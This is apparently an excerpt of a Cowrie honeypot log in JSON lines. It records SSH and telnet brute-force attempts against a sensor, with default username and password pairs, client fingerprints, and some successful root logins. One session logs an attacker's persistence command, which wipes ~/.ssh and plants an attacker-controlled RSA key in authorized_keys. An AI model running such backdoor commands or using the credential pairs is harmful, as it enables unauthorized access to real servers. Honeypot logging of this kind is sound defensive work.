256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:10:26.420412Z","src_ip":"212.227.235.229","session":"668d9f546cf2"}
{"eventid":"cowrie.login.failed","username":"repository","password":"repository","message":"login attempt [repository/repository] failed","sensor":"my-vps","timestamp":"2025-08-31T05:10:26.830584Z","src_ip":"212.227.235.229","session":"668d9f546cf2"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"123456","message":"login attempt [hadoop/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T05:10:27.616325Z","src_ip":"212.227.235.229","session":"84823e3cddf8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410","size":28,"shasum":"eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410","duplicate":true,"duration":"2.1","message":"Closing TTY Log: var/lib/cowrie/tty/eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410 after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:10:27.683122Z","src_ip":"201.148.180.50","session":"cd26fdedac96"}
{"eventid":"cowrie.session.closed","duration":"11.9","message":"Connection lost after 11.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:10:27.684975Z","src_ip":"201.148.180.50","session":"cd26fdedac96"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:10:27.925159Z","src_ip":"212.227.235.229","session":"668d9f546cf2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52458,"dst_ip":"1.2.3.4","dst_port":22,"session":"1a1bdd362b2a","protocol":"ssh","message":"New connection: 212.227.235.229:52458 (1.2.3.4:22) [session: 1a1bdd362b2a]","sensor":"my-vps","timestamp":"2025-08-31T05:10:32.389865Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:10:33.093784Z","src_ip":"212.227.235.229","session":"1a1bdd362b2a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:10:33.094753Z","src_ip":"212.227.235.229","session":"1a1bdd362b2a"}
{"eventid":"cowrie.session.closed","duration":"39.2","message":"Connection lost after 39.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:10:34.908521Z","src_ip":"212.227.235.229","session":"84823e3cddf8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53464,"dst_ip":"1.2.3.4","dst_port":23,"session":"1ff86cde9c6e","protocol":"telnet","message":"New connection: 212.227.125.160:53464 (1.2.3.4:23) [session: 1ff86cde9c6e]","sensor":"my-vps","timestamp":"2025-08-31T05:10:36.223147Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36832,"dst_ip":"1.2.3.4","dst_port":22,"session":"fe869f96268e","protocol":"ssh","message":"New connection: 212.227.235.229:36832 (1.2.3.4:22) [session: fe869f96268e]","sensor":"my-vps","timestamp":"2025-08-31T05:10:37.280469Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:10:37.281159Z","src_ip":"212.227.235.229","session":"fe869f96268e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:10:37.548306Z","src_ip":"212.227.235.229","session":"fe869f96268e"}
{"eventid":"cowrie.login.success","username":"root","password":"ngf1r3wall","message":"login attempt [root/ngf1r3wall] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:10:38.637881Z","src_ip":"212.227.235.229","session":"fe869f96268e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:10:39.176161Z","src_ip":"212.227.235.229","session":"fe869f96268e"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:10:39.176841Z","src_ip":"212.227.235.229","session":"fe869f96268e"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:10:39.177675Z","src_ip":"212.227.235.229","session":"fe869f96268e"}
{"eventid":"cowrie.login.failed","username":"server","password":"password1","message":"login attempt [server/password1] failed","sensor":"my-vps","timestamp":"2025-08-31T05:10:39.233285Z","src_ip":"212.227.235.229","session":"1a1bdd362b2a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.8","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:10:39.994525Z","src_ip":"212.227.235.229","session":"fe869f96268e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:10:41.244299Z","src_ip":"212.227.235.229","session":"fe869f96268e"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:10:41.244973Z","src_ip":"212.227.235.229","session":"fe869f96268e"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:10:41.247711Z","src_ip":"212.227.235.229","session":"1a1bdd362b2a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:10:41.508557Z","src_ip":"212.227.235.229","session":"fe869f96268e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:10:41.509464Z","src_ip":"212.227.235.229","session":"fe869f96268e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43922,"dst_ip":"1.2.3.4","dst_port":22,"session":"d0a8900f8d0c","protocol":"ssh","message":"New connection: 212.227.235.229:43922 (1.2.3.4:22) [session: d0a8900f8d0c]","sensor":"my-vps","timestamp":"2025-08-31T05:10:41.773118Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:10:41.774267Z","src_ip":"212.227.235.229","session":"d0a8900f8d0c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:10:42.037775Z","src_ip":"212.227.235.229","session":"d0a8900f8d0c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55874,"dst_ip":"1.2.3.4","dst_port":22,"session":"1ceb67d6b322","protocol":"ssh","message":"New connection: 212.227.235.229:55874 (1.2.3.4:22) [session: 1ceb67d6b322]","sensor":"my-vps","timestamp":"2025-08-31T05:10:42.145130Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:10:42.166605Z","src_ip":"212.227.235.229","session":"1ceb67d6b322"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:10:42.336354Z","src_ip":"212.227.235.229","session":"1ceb67d6b322"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43032,"dst_ip":"1.2.3.4","dst_port":22,"session":"7cc367d8d55d","protocol":"ssh","message":"New connection: 212.227.125.160:43032 (1.2.3.4:22) [session: 7cc367d8d55d]","sensor":"my-vps","timestamp":"2025-08-31T05:10:42.381968Z"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:10:43.135177Z","src_ip":"212.227.235.229","session":"d0a8900f8d0c"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:10:44.409774Z","src_ip":"212.227.235.229","session":"d0a8900f8d0c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43934,"dst_ip":"1.2.3.4","dst_port":22,"session":"b9b3d18d9be3","protocol":"ssh","message":"New connection: 212.227.235.229:43934 (1.2.3.4:22) [session: b9b3d18d9be3]","sensor":"my-vps","timestamp":"2025-08-31T05:10:44.663418Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:10:44.664377Z","src_ip":"212.227.235.229","session":"b9b3d18d9be3"}
{"eventid":"cowrie.login.failed","username":"sammy","password":"password","message":"login attempt [sammy/password] failed","sensor":"my-vps","timestamp":"2025-08-31T05:10:44.732579Z","src_ip":"212.227.235.229","session":"1ceb67d6b322"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:10:44.921013Z","src_ip":"212.227.235.229","session":"b9b3d18d9be3"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:10:45.946065Z","src_ip":"212.227.235.229","session":"1ceb67d6b322"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:10:45.981492Z","src_ip":"212.227.235.229","session":"b9b3d18d9be3"}
{"eventid":"cowrie.session.closed","duration":"9.0","message":"Connection lost after 9.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:10:46.237590Z","src_ip":"212.227.235.229","session":"fe869f96268e"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:10:46.240801Z","src_ip":"212.227.235.229","session":"b9b3d18d9be3"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:10:48.823250Z","src_ip":"212.227.125.160","session":"7cc367d8d55d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:10:48.824605Z","src_ip":"212.227.125.160","session":"7cc367d8d55d"}
{"eventid":"cowrie.session.closed","duration":31.113287687301636,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:10:49.653332Z","src_ip":"212.227.235.229","session":"8e0f9df3bcb9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54618,"dst_ip":"1.2.3.4","dst_port":22,"session":"21d5b8f6f8e7","protocol":"ssh","message":"New connection: 212.227.235.229:54618 (1.2.3.4:22) [session: 21d5b8f6f8e7]","sensor":"my-vps","timestamp":"2025-08-31T05:10:49.820896Z"}
{"eventid":"cowrie.client.version","version":"GET / HTTP/1.1","message":"Remote SSH version: GET / HTTP/1.1","sensor":"my-vps","timestamp":"2025-08-31T05:10:49.822171Z","src_ip":"212.227.235.229","session":"21d5b8f6f8e7"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:10:49.823479Z","src_ip":"212.227.235.229","session":"21d5b8f6f8e7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42136,"dst_ip":"1.2.3.4","dst_port":22,"session":"ead70e419c8d","protocol":"ssh","message":"New connection: 212.227.125.160:42136 (1.2.3.4:22) [session: ead70e419c8d]","sensor":"my-vps","timestamp":"2025-08-31T05:10:54.240065Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:10:54.584789Z","src_ip":"212.227.125.160","session":"ead70e419c8d"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:10:54.585443Z","src_ip":"212.227.125.160","session":"ead70e419c8d"}
{"eventid":"cowrie.login.failed","username":"server","password":"password1","message":"login attempt [server/password1] failed","sensor":"my-vps","timestamp":"2025-08-31T05:10:56.561466Z","src_ip":"212.227.125.160","session":"ead70e419c8d"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:10:58.174131Z","src_ip":"212.227.125.160","session":"ead70e419c8d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48662,"dst_ip":"1.2.3.4","dst_port":22,"session":"84b7fd8af183","protocol":"ssh","message":"New connection: 212.227.235.229:48662 (1.2.3.4:22) [session: 84b7fd8af183]","sensor":"my-vps","timestamp":"2025-08-31T05:11:02.743352Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48812,"dst_ip":"1.2.3.4","dst_port":22,"session":"a87bd35f7ba1","protocol":"ssh","message":"New connection: 212.227.235.229:48812 (1.2.3.4:22) [session: a87bd35f7ba1]","sensor":"my-vps","timestamp":"2025-08-31T05:11:06.376288Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:11:06.378944Z","src_ip":"212.227.235.229","session":"a87bd35f7ba1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-g